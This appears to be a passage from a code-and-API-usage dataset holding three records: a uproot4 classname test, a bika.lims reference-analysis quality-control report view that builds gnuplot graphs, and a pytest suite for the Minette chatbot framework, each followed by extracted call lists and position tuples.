'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (3564, 3567), False, 'import time\n'), ((3214, 3222), 'os.getpid', 'getpid', ([], {}), '()\n', (3220, 3222), False, 'from os import getpid\n')]
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/master/LICENSE
from __future__ import absolute_import
import pytest
import skhep_testdata
import uproot4
def test_version():
assert uproot4.classname_decode(
uproot4.classname_encode("xAOD::MissingETAuxAssociationMap_v2")
) == ("xAOD::MissingETAuxAssociationMap_v2", None)
assert uproot4.classname_decode(
uproot4.classname_encode("xAOD::MissingETAuxAssociationMap_v2", 9)
) == ("xAOD::MissingETAuxAssociationMap_v2", 9)
|
[
"uproot4.classname_encode"
] |
[((246, 309), 'uproot4.classname_encode', 'uproot4.classname_encode', (['"""xAOD::MissingETAuxAssociationMap_v2"""'], {}), "('xAOD::MissingETAuxAssociationMap_v2')\n", (270, 309), False, 'import uproot4\n'), ((410, 476), 'uproot4.classname_encode', 'uproot4.classname_encode', (['"""xAOD::MissingETAuxAssociationMap_v2"""', '(9)'], {}), "('xAOD::MissingETAuxAssociationMap_v2', 9)\n", (434, 476), False, 'import uproot4\n')]
|
import json
import tempfile
from AccessControl import getSecurityManager
from DateTime import DateTime
from Products.CMFCore.utils import getToolByName
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t, isAttributeHidden
from bika.lims.browser import BrowserView
from bika.lims.browser.reports.selection_macros import SelectionMacrosView
from gpw import plot
from bika.lims.utils import to_utf8
from plone.app.content.browser.interfaces import IFolderContentsView
from plone.app.layout.globals.interfaces import IViewView
from zope.interface import implements
import os
import plone
class Report(BrowserView):
implements(IViewView)
template = ViewPageTemplateFile(
"templates/qualitycontrol_referenceanalysisqc.pt")
# if unsuccessful we return here:
default_template = ViewPageTemplateFile("templates/qualitycontrol.pt")
def __init__(self, context, request, report=None):
super(Report, self).__init__(context, request)
self.report = report
self.selection_macros = SelectionMacrosView(self.context, self.request)
def __call__(self):
header = _("Reference analysis QC")
subheader = _("Reference analysis quality control graphs ")
MinimumResults = self.context.bika_setup.getMinimumResults()
warning_icon = "<img src='" + self.portal_url + "/++resource++bika.lims.images/warning.png' height='9' width='9'/>"
error_icon = "<img src='" + self.portal_url + "/++resource++bika.lims.images/exclamation.png' height='9' width='9'/>"
self.parms = []
titles = []
sample_uid = self.request.form.get('ReferenceSampleUID', '')
sample = self.reference_catalog.lookupObject(sample_uid)
if not sample:
message = _("No reference sample was selected.")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
self.parms.append(
{'title': _("Reference Sample"), 'value': sample.Title()})
titles.append(sample.Title())
service_uid = self.request.form.get('ReferenceServiceUID', '')
service = self.reference_catalog.lookupObject(service_uid)
if not service:
message = _("No analysis services were selected.")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
self.contentFilter = {'portal_type': 'ReferenceAnalysis',
'review_state': ['verified', 'published'],
'path': {
"query": "/".join(sample.getPhysicalPath()),
"level": 0}}
self.parms.append(
{'title': _("Analysis Service"), 'value': service.Title()})
titles.append(service.Title())
val = self.selection_macros.parse_daterange(self.request,
'getDateVerified',
'DateVerified')
if val:
self.contentFilter[val['contentFilter'][0]] = val['contentFilter'][1]
self.parms.append(val['parms'])
titles.append(val['titles'])
proxies = self.bika_analysis_catalog(self.contentFilter)
if not proxies:
message = _("No analyses matched your query")
self.context.plone_utils.addPortalMessage(message, 'error')
return self.default_template()
# Compile a list with all relevant analysis data
analyses = []
out_of_range_count = 0
results = []
capture_dates = []
plotdata = ""
tabledata = []
for analysis in proxies:
analysis = analysis.getObject()
service = analysis.getService()
resultsrange = \
[x for x in sample.getReferenceResults() if x['uid'] == service_uid][
0]
try:
result = float(analysis.getResult())
results.append(result)
except:
result = analysis.getResult()
capture_dates.append(analysis.getResultCaptureDate())
if result < float(resultsrange['min']) or result > float(
resultsrange['max']):
out_of_range_count += 1
try:
precision = str(analysis.getPrecision())
except:
precision = "2"
try:
formatted_result = str("%." + precision + "f") % result
except:
formatted_result = result
tabledata.append({_("Analysis"): analysis.getId(),
_("Result"): formatted_result,
_("Analyst"): analysis.getAnalyst(),
_(
"Captured"): analysis.getResultCaptureDate().strftime(
self.date_format_long)})
plotdata += "%s\t%s\t%s\t%s\n" % (
analysis.getResultCaptureDate().strftime(self.date_format_long),
result,
resultsrange['min'],
resultsrange['max']
)
plotdata.encode('utf-8')
result_values = [int(r) for r in results]
result_dates = [c for c in capture_dates]
self.parms += [
{"title": _("Total analyses"), "value": len(proxies)},
]
# # This variable is output to the TAL
self.report_data = {
'header': header,
'subheader': subheader,
'parms': self.parms,
'tables': [],
'footnotes': [],
}
if MinimumResults <= len(proxies):
plotscript = """
set terminal png transparent truecolor enhanced size 700,350 font "Verdana, 8"
set title "%(title)s"
set xlabel "%(xlabel)s"
set ylabel "%(ylabel)s"
set key off
#set logscale
set timefmt "%(timefmt)s"
set xdata time
set format x "%(xformat)s"
set xrange ["%(x_start)s":"%(x_end)s"]
set auto fix
set offsets graph 0, 0, 1, 1
set xtics border nomirror rotate by 90 font "Verdana, 5" offset 0,-3
set ytics nomirror
f(x) = mean_y
fit f(x) 'gpw_DATAFILE_gpw' u 1:3 via mean_y
stddev_y = sqrt(FIT_WSSR / (FIT_NDF + 1))
plot mean_y-stddev_y with filledcurves y1=mean_y lt 1 lc rgb "#efefef",\
mean_y+stddev_y with filledcurves y1=mean_y lt 1 lc rgb "#efefef",\
mean_y with lines lc rgb '#ffffff' lw 3,\
"gpw_DATAFILE_gpw" using 1:3 title 'data' with points pt 7 ps 1 lc rgb '#0000ee' lw 2,\
'' using 1:3 smooth unique lc rgb '#aaaaaa' lw 2,\
'' using 1:4 with lines lc rgb '#000000' lw 1,\
'' using 1:5 with lines lc rgb '#000000' lw 1""" % \
{
'title': "",
'xlabel': "",
'ylabel': service.getUnit(),
'x_start': "%s" % min(result_dates).strftime(
self.date_format_short),
'x_end': "%s" % max(result_dates).strftime(
self.date_format_short),
'timefmt': r'%Y-%m-%d %H:%M',
'xformat': '%%Y-%%m-%%d\n%%H:%%M',
}
plot_png = plot(str(plotdata), plotscript=str(plotscript),
usefifo=False)
# Temporary PNG data file
fh, data_fn = tempfile.mkstemp(suffix='.png')
os.write(fh, plot_png)
plot_url = data_fn
self.request['to_remove'].append(data_fn)
plot_url = data_fn
else:
plot_url = ""
table = {
'title': "%s: %s (%s)" % (
t(_("Analysis Service")),
service.Title(),
service.getKeyword()
),
'columns': [_('Analysis'),
_('Result'),
_('Analyst'),
_('Captured')],
'parms': [],
'data': tabledata,
'plot_url': plot_url,
}
self.report_data['tables'].append(table)
translate = self.context.translate
## footnotes
if out_of_range_count:
msgid = _("Analyses out of range")
self.report_data['footnotes'].append(
"%s %s" % (error_icon, t(msgid)))
self.report_data['parms'].append(
{"title": _("Analyses out of range"),
"value": out_of_range_count})
title = t(header)
if titles:
title += " (%s)" % " ".join(titles)
return {
'report_title': title,
'report_data': self.template(),
}
def isSamplePointHidden(self):
return isAttributeHidden('AnalysisRequest', 'SamplePoint')
|
[
"bika.lims.utils.isAttributeHidden",
"bika.lims.bikaMessageFactory",
"bika.lims.browser.reports.selection_macros.SelectionMacrosView",
"bika.lims.utils.t",
"zope.interface.implements",
"tempfile.mkstemp",
"Products.Five.browser.pagetemplatefile.ViewPageTemplateFile",
"os.write"
] |
[((715, 736), 'zope.interface.implements', 'implements', (['IViewView'], {}), '(IViewView)\n', (725, 736), False, 'from zope.interface import implements\n'), ((753, 824), 'Products.Five.browser.pagetemplatefile.ViewPageTemplateFile', 'ViewPageTemplateFile', (['"""templates/qualitycontrol_referenceanalysisqc.pt"""'], {}), "('templates/qualitycontrol_referenceanalysisqc.pt')\n", (773, 824), False, 'from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n'), ((895, 946), 'Products.Five.browser.pagetemplatefile.ViewPageTemplateFile', 'ViewPageTemplateFile', (['"""templates/qualitycontrol.pt"""'], {}), "('templates/qualitycontrol.pt')\n", (915, 946), False, 'from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n'), ((1119, 1166), 'bika.lims.browser.reports.selection_macros.SelectionMacrosView', 'SelectionMacrosView', (['self.context', 'self.request'], {}), '(self.context, self.request)\n', (1138, 1166), False, 'from bika.lims.browser.reports.selection_macros import SelectionMacrosView\n'), ((1210, 1236), 'bika.lims.bikaMessageFactory', '_', (['"""Reference analysis QC"""'], {}), "('Reference analysis QC')\n", (1211, 1236), True, 'from bika.lims import bikaMessageFactory as _\n'), ((1257, 1304), 'bika.lims.bikaMessageFactory', '_', (['"""Reference analysis quality control graphs """'], {}), "('Reference analysis quality control graphs ')\n", (1258, 1304), True, 'from bika.lims import bikaMessageFactory as _\n'), ((9001, 9010), 'bika.lims.utils.t', 't', (['header'], {}), '(header)\n', (9002, 9010), False, 'from bika.lims.utils import t, isAttributeHidden\n'), ((9235, 9286), 'bika.lims.utils.isAttributeHidden', 'isAttributeHidden', (['"""AnalysisRequest"""', '"""SamplePoint"""'], {}), "('AnalysisRequest', 'SamplePoint')\n", (9252, 9286), False, 'from bika.lims.utils import t, isAttributeHidden\n'), ((1851, 1889), 'bika.lims.bikaMessageFactory', '_', (['"""No reference sample was selected."""'], {}), "('No reference sample was selected.')\n", (1852, 1889), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2327, 2367), 'bika.lims.bikaMessageFactory', '_', (['"""No analysis services were selected."""'], {}), "('No analysis services were selected.')\n", (2328, 2367), True, 'from bika.lims import bikaMessageFactory as _\n'), ((3421, 3456), 'bika.lims.bikaMessageFactory', '_', (['"""No analyses matched your query"""'], {}), "('No analyses matched your query')\n", (3422, 3456), True, 'from bika.lims import bikaMessageFactory as _\n'), ((7892, 7923), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".png"""'}), "(suffix='.png')\n", (7908, 7923), False, 'import tempfile\n'), ((7936, 7958), 'os.write', 'os.write', (['fh', 'plot_png'], {}), '(fh, plot_png)\n', (7944, 7958), False, 'import os\n'), ((8721, 8747), 'bika.lims.bikaMessageFactory', '_', (['"""Analyses out of range"""'], {}), "('Analyses out of range')\n", (8722, 8747), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2055, 2076), 'bika.lims.bikaMessageFactory', '_', (['"""Reference Sample"""'], {}), "('Reference Sample')\n", (2056, 2076), True, 'from bika.lims import bikaMessageFactory as _\n'), ((2831, 2852), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis Service"""'], {}), "('Analysis Service')\n", (2832, 2852), True, 'from bika.lims import bikaMessageFactory as _\n'), ((5497, 5516), 'bika.lims.bikaMessageFactory', '_', (['"""Total analyses"""'], {}), "('Total analyses')\n", (5498, 5516), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8324, 8337), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis"""'], {}), "('Analysis')\n", (8325, 8337), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8363, 8374), 'bika.lims.bikaMessageFactory', '_', (['"""Result"""'], {}), "('Result')\n", (8364, 8374), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8400, 8412), 'bika.lims.bikaMessageFactory', '_', (['"""Analyst"""'], {}), "('Analyst')\n", (8401, 8412), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8438, 8451), 'bika.lims.bikaMessageFactory', '_', (['"""Captured"""'], {}), "('Captured')\n", (8439, 8451), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8913, 8939), 'bika.lims.bikaMessageFactory', '_', (['"""Analyses out of range"""'], {}), "('Analyses out of range')\n", (8914, 8939), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4734, 4747), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis"""'], {}), "('Analysis')\n", (4735, 4747), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4797, 4808), 'bika.lims.bikaMessageFactory', '_', (['"""Result"""'], {}), "('Result')\n", (4798, 4808), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4858, 4870), 'bika.lims.bikaMessageFactory', '_', (['"""Analyst"""'], {}), "('Analyst')\n", (4859, 4870), True, 'from bika.lims import bikaMessageFactory as _\n'), ((4925, 4938), 'bika.lims.bikaMessageFactory', '_', (['"""Captured"""'], {}), "('Captured')\n", (4926, 4938), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8191, 8212), 'bika.lims.bikaMessageFactory', '_', (['"""Analysis Service"""'], {}), "('Analysis Service')\n", (8192, 8212), True, 'from bika.lims import bikaMessageFactory as _\n'), ((8837, 8845), 'bika.lims.utils.t', 't', (['msgid'], {}), '(msgid)\n', (8838, 8845), False, 'from bika.lims.utils import t, isAttributeHidden\n')]
|
import sys
import os
sys.path.append(os.pardir)
import pytest
from pytz import timezone
from logging import Logger, FileHandler, getLogger
from datetime import datetime
from types import GeneratorType
from minette import (
Minette, DialogService, SQLiteConnectionProvider,
SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore,
Tagger, Config, DialogRouter, StoreSet, Message, User, Group,
DependencyContainer, Payload
)
from minette.utils import date_to_unixtime
from minette.tagger.janometagger import JanomeTagger
now = datetime.now()
user_id = "user_id" + str(date_to_unixtime(now))
print("user_id: {}".format(user_id))
class CustomTagger(Tagger):
pass
class CustomConnectionProvider(SQLiteConnectionProvider):
pass
class CustomContextStore(SQLiteContextStore):
pass
class CustomUserStore(SQLiteUserStore):
pass
class CustomMessageLogStore(SQLiteMessageLogStore):
pass
class CustomDataStores(StoreSet):
connection_provider = CustomConnectionProvider
context_store = CustomContextStore
user_store = CustomUserStore
messagelog_store = CustomMessageLogStore
class MyDialog(DialogService):
def compose_response(self, request, context, connection):
return "res:" + request.text
class ErrorDialog(DialogService):
def compose_response(self, request, context, connection):
1 / 0
return "res:" + request.text
class MyDialogRouter(DialogRouter):
def __init__(self, custom_router_arg=None, **kwargs):
super().__init__(**kwargs)
self.custom_attr = custom_router_arg
class TaggerDialog(DialogService):
def compose_response(self, request, context, connection):
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
class TaggerManuallyParseDialog(DialogService):
def compose_response(self, request, context, connection):
assert request.words == []
request.words = self.dependencies.tagger.parse(request.text, max_length=10)
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
class TaggerManuallyParseGeneratorDialog(DialogService):
def compose_response(self, request, context, connection):
assert request.words == []
request.words = self.dependencies.tagger.parse_as_generator(request.text, max_length=10)
return request.to_reply(
text=request.text,
payloads=[Payload(content_type="data", content=request.words)])
def test_init():
# without config
bot = Minette()
assert bot.config.get("timezone") == "UTC"
assert bot.timezone == timezone("UTC")
assert isinstance(bot.logger, Logger)
assert bot.logger.name == "minette"
assert isinstance(bot.connection_provider, SQLiteConnectionProvider)
assert isinstance(bot.context_store, SQLiteContextStore)
assert isinstance(bot.user_store, SQLiteUserStore)
assert isinstance(bot.messagelog_store, SQLiteMessageLogStore)
assert bot.default_dialog_service is None
assert isinstance(bot.tagger, Tagger)
def test_init_config():
bot = Minette(config_file="./config/test_config.ini")
assert bot.timezone == timezone("Asia/Tokyo")
for handler in bot.logger.handlers:
if isinstance(handler, FileHandler):
assert handler.baseFilename == \
os.path.join(os.path.dirname(os.path.abspath(__file__)),
bot.config.get("log_file"))
assert bot.connection_provider.connection_str != ""
assert bot.connection_provider.connection_str == \
bot.config.get("connection_str")
assert bot.context_store.timeout == bot.config.get("context_timeout")
assert bot.context_store.table_name == bot.config.get("context_table")
assert bot.user_store.table_name == bot.config.get("user_table")
assert bot.messagelog_store.table_name == \
bot.config.get("messagelog_table")
def test_init_args():
# initialize arguments
config = Config("")
config.confg_parser.add_section("test_section")
config.confg_parser.set("test_section", "test_key", "test_value")
tz = timezone("Asia/Tokyo")
logger = getLogger("test_core_logger")
print(logger.name)
connection_provider = CustomConnectionProvider
context_store = CustomContextStore
user_store = CustomUserStore
messagelog_store = CustomMessageLogStore
data_stores = CustomDataStores
default_dialog_service = MyDialog
dialog_router = MyDialogRouter
tagger = CustomTagger
custom_router_arg = "router_value"
# create bot
bot = Minette(
config=config, timezone=tz, logger=logger,
connection_provider=connection_provider, context_store=context_store,
user_store=user_store, messagelog_store=messagelog_store,
default_dialog_service=default_dialog_service,
dialog_router=dialog_router,
custom_router_arg=custom_router_arg,
tagger=tagger, prepare_table=True
)
assert bot.config.get("test_key", section="test_section") == "test_value"
assert bot.timezone == timezone("Asia/Tokyo")
assert bot.logger.name == "test_core_logger"
assert isinstance(bot.connection_provider, CustomConnectionProvider)
assert isinstance(bot.context_store, CustomContextStore)
assert isinstance(bot.user_store, CustomUserStore)
assert isinstance(bot.messagelog_store, CustomMessageLogStore)
assert bot.default_dialog_service is MyDialog
assert isinstance(bot.dialog_router, MyDialogRouter)
assert bot.dialog_router.custom_attr == "router_value"
assert isinstance(bot.tagger, CustomTagger)
# create bot with data_stores
bot = Minette(
config=config, timezone=tz, logger=logger,
data_stores=data_stores,
default_dialog_service=default_dialog_service,
dialog_router=dialog_router,
custom_router_arg=custom_router_arg,
tagger=tagger, prepare_table=True
)
assert bot.config.get("test_key", section="test_section") == "test_value"
assert bot.timezone == timezone("Asia/Tokyo")
assert bot.logger.name == "test_core_logger"
assert isinstance(bot.connection_provider, CustomConnectionProvider)
assert isinstance(bot.context_store, CustomContextStore)
assert isinstance(bot.user_store, CustomUserStore)
assert isinstance(bot.messagelog_store, CustomMessageLogStore)
assert bot.default_dialog_service is MyDialog
assert isinstance(bot.dialog_router, MyDialogRouter)
assert bot.dialog_router.custom_attr == "router_value"
assert isinstance(bot.tagger, CustomTagger)
def test_get_user():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register user for test
u = bot.user_store.get(
channel="get_user_test", channel_user_id=user_id,
connection=connection)
u.name = "user channel"
bot.user_store.save(u, connection)
u_detail = bot.user_store.get(
channel="get_user_test_detail", channel_user_id=user_id,
connection=connection)
u_detail.name = "user detail"
bot.user_store.save(u_detail, connection)
# without detail
request = Message(
text="hello", channel="get_user_test", channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "get_user_test"
assert user.channel_user_id == user_id
assert user.name == "user channel"
# with detail
bot.config.confg_parser.set("minette", "user_scope", "channel_detail")
request = Message(
text="hello", channel="get_user_test", channel_detail="detail",
channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "get_user_test_detail"
assert user.channel_user_id == user_id
assert user.name == "user detail"
def test_save_user():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register user for test
u = bot.user_store.get(
channel="save_user_test", channel_user_id=user_id,
connection=connection)
u.name = "<NAME>"
# save
bot._save_user(u, connection)
# check
request = Message(
text="hello", channel="save_user_test", channel_user_id=user_id)
user = bot._get_user(request, connection)
assert user.channel == "save_user_test"
assert user.channel_user_id == user_id
assert user.name == "<NAME>"
def test_get_context():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register context for test
ctx = bot.context_store.get(
channel="get_context_test", channel_user_id=user_id,
connection=connection)
ctx.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx, connection)
ctx_group = bot.context_store.get(
channel="get_context_test", channel_user_id="group_" + user_id,
connection=connection)
ctx_group.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx_group, connection)
ctx_detail = bot.context_store.get(
channel="get_context_test_detail", channel_user_id=user_id,
connection=connection)
ctx_detail.data["unixtime"] = date_to_unixtime(now)
bot.context_store.save(ctx_detail, connection)
# without detail
request = Message(
text="hello", channel="get_context_test", channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
# group without group
request = Message(
text="hello", channel="get_context_test", channel_user_id=user_id)
request.group = Group(id="group_" + user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test"
assert context.channel_user_id == "group_" + user_id
assert context.data["unixtime"] == date_to_unixtime(now)
# with detail
bot.config.confg_parser.set(
"minette", "context_scope", "channel_detail")
request = Message(
text="hello", channel="get_context_test", channel_detail="detail",
channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "get_context_test_detail"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
def test_save_context():
bot = Minette(prepare_table=True)
with bot.connection_provider.get_connection() as connection:
# register context for test
ctx = bot.context_store.get(
channel="save_context_test", channel_user_id=user_id,
connection=connection)
ctx.data["unixtime"] = date_to_unixtime(now)
# save
ctx.topic.keep_on = True
bot._save_context(ctx, connection)
# check
request = Message(
text="hello", channel="save_context_test", channel_user_id=user_id)
context = bot._get_context(request, connection)
assert context.channel == "save_context_test"
assert context.channel_user_id == user_id
assert context.data["unixtime"] == date_to_unixtime(now)
def test_chat():
bot = Minette(default_dialog_service=MyDialog)
res = bot.chat("hello")
assert res.messages[0].text == "res:hello"
def test_chat_error():
bot = Minette(default_dialog_service=MyDialog)
bot.connection_provider = None
res = bot.chat("hello")
assert res.messages == []
def test_chat_messagelog_error():
bot = Minette(default_dialog_service=MyDialog)
bot.messagelog_store = None
res = bot.chat("hello")
assert res.messages[0].text == "res:hello"
def test_chat_dialog_error():
bot = Minette(default_dialog_service=ErrorDialog)
res = bot.chat("hello")
assert res.messages[0].text == "?"
def test_chat_timezone():
bot = Minette(default_dialog_service=MyDialog, timezone=timezone("Asia/Tokyo"))
res = bot.chat("hello")
# bot.timezone itself is +9:19
assert res.messages[0].timestamp.tzinfo == datetime.now(tz=bot.timezone).tzinfo
def test_chat_with_tagger():
bot = Minette(
default_dialog_service=TaggerDialog,
tagger=JanomeTagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_chat_with_tagger_no_parse():
bot = Minette(
default_dialog_service=TaggerDialog,
tagger=JanomeTagger, tagger_max_length=0)
assert bot.tagger.max_length == 0
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words == []
def test_chat_parse_morph_manually():
bot = Minette(
default_dialog_service=TaggerManuallyParseDialog,
tagger=JanomeTagger, tagger_max_length=0)
bot.dialog_uses(tagger=bot.tagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
words = res.messages[0].payloads[0].content
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_chat_parse_morph_manually_generator():
bot = Minette(
default_dialog_service=TaggerManuallyParseGeneratorDialog,
tagger=JanomeTagger, tagger_max_length=0)
bot.dialog_uses(tagger=bot.tagger)
res = bot.chat("今日はいい天気です。")
assert res.messages[0].text == "今日はいい天気です。"
assert isinstance(res.messages[0].payloads[0].content, GeneratorType)
words = [w for w in res.messages[0].payloads[0].content]
assert words[0].surface == "今日"
assert words[1].surface == "は"
assert words[2].surface == "いい"
assert words[3].surface == "天気"
assert words[4].surface == "です"
def test_dialog_uses():
class HighCostToCreate:
pass
class OnlyForFooDS:
pass
class FooFialog(DialogService):
pass
# run once when create bot
hctc = HighCostToCreate()
offds = OnlyForFooDS()
# create bot
bot = Minette()
# set dependencies to dialogs
bot.dialog_uses(
{
FooFialog: {"api": offds}
},
highcost=hctc
)
assert bot.dialog_router.dependencies.highcost == hctc
assert hasattr(bot.dialog_router.dependencies, "api") is False
assert bot.dialog_router.dependency_rules[FooFialog]["api"] == offds
# create bot and not set dialog dependencies
bot_no_dd = Minette()
assert bot_no_dd.dialog_router.dependencies is None
bot_no_dd.dialog_uses()
assert isinstance(bot_no_dd.dialog_router.dependencies, DependencyContainer)
|
[
"sys.path.append",
"minette.Payload",
"os.path.abspath",
"minette.Group",
"logging.getLogger",
"minette.Config",
"minette.utils.date_to_unixtime",
"minette.Message",
"pytz.timezone",
"datetime.datetime.now",
"minette.Minette"
] |
[((21, 47), 'sys.path.append', 'sys.path.append', (['os.pardir'], {}), '(os.pardir)\n', (36, 47), False, 'import sys\n'), ((546, 560), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (558, 560), False, 'from datetime import datetime\n'), ((2640, 2649), 'minette.Minette', 'Minette', ([], {}), '()\n', (2647, 2649), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((3202, 3249), 'minette.Minette', 'Minette', ([], {'config_file': '"""./config/test_config.ini"""'}), "(config_file='./config/test_config.ini')\n", (3209, 3249), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((4072, 4082), 'minette.Config', 'Config', (['""""""'], {}), "('')\n", (4078, 4082), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((4214, 4236), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (4222, 4236), False, 'from pytz import timezone\n'), ((4250, 4279), 'logging.getLogger', 'getLogger', (['"""test_core_logger"""'], {}), "('test_core_logger')\n", (4259, 4279), False, 'from logging import Logger, FileHandler, getLogger\n'), ((4672, 5017), 'minette.Minette', 'Minette', ([], {'config': 'config', 'timezone': 'tz', 'logger': 'logger', 'connection_provider': 'connection_provider', 'context_store': 'context_store', 'user_store': 'user_store', 'messagelog_store': 'messagelog_store', 'default_dialog_service': 'default_dialog_service', 'dialog_router': 'dialog_router', 'custom_router_arg': 'custom_router_arg', 'tagger': 'tagger', 'prepare_table': '(True)'}), '(config=config, timezone=tz, logger=logger, connection_provider=\n connection_provider, context_store=context_store, user_store=user_store,\n messagelog_store=messagelog_store, default_dialog_service=\n default_dialog_service, dialog_router=dialog_router, custom_router_arg=\n custom_router_arg, tagger=tagger, prepare_table=True)\n', (4679, 5017), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((5753, 5989), 'minette.Minette', 'Minette', ([], {'config': 'config', 'timezone': 'tz', 'logger': 'logger', 'data_stores': 'data_stores', 'default_dialog_service': 'default_dialog_service', 'dialog_router': 'dialog_router', 'custom_router_arg': 'custom_router_arg', 'tagger': 'tagger', 'prepare_table': '(True)'}), '(config=config, timezone=tz, logger=logger, data_stores=data_stores,\n default_dialog_service=default_dialog_service, dialog_router=\n dialog_router, custom_router_arg=custom_router_arg, tagger=tagger,\n prepare_table=True)\n', (5760, 5989), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((6711, 6738), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (6718, 6738), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((8057, 8084), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (8064, 8084), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((8732, 8759), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (8739, 8759), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10942, 10969), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (10949, 10969), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11732, 11772), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (11739, 11772), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11883, 11923), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (11890, 11923), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12063, 12103), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (12070, 12103), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12253, 12296), 'minette.Minette', 'Minette', 